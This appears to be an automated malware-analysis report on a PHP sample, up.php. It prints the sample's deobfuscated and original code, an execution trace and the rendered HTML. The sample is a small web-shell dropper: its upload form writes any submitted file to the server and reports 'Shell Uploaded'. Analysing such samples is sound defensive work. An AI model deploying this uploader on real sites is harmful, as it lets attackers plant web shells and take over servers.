PHP Malware Analysis
up.php
md5: 2068c61ae08c7985f8408092f6ce1a87
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Files
- copy (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- Vuln!! patch it Now! (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<title>Vuln!! patch it Now!</title><?php
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>";
if ($_POST['_upl'] == "Upload") {
if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo "<b>Shell Uploaded ! :)<b><br><br>";
} else {
echo "<b>Not uploaded ! </b><br><br>";
}
}Execution traces
data/traces/2068c61ae08c7985f8408092f6ce1a87_trace-1676263088.8313.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:38:34.729089]
1 0 1 0.000141 393464
1 3 0 0.000197 395720 {main} 1 /var/www/html/uploads/up.php 0 0
1 3 1 0.000231 395720
0.000257 314200
TRACE END [2023-02-13 02:38:34.729234]
Generated HTML code
<html><head><title>Vuln!! patch it Now!</title></head><body><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></body></html>Original PHP code
<title>Vuln!! patch it Now!</title><?php echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }else { echo '<b>Not uploaded ! </b><br><br>'; }}?>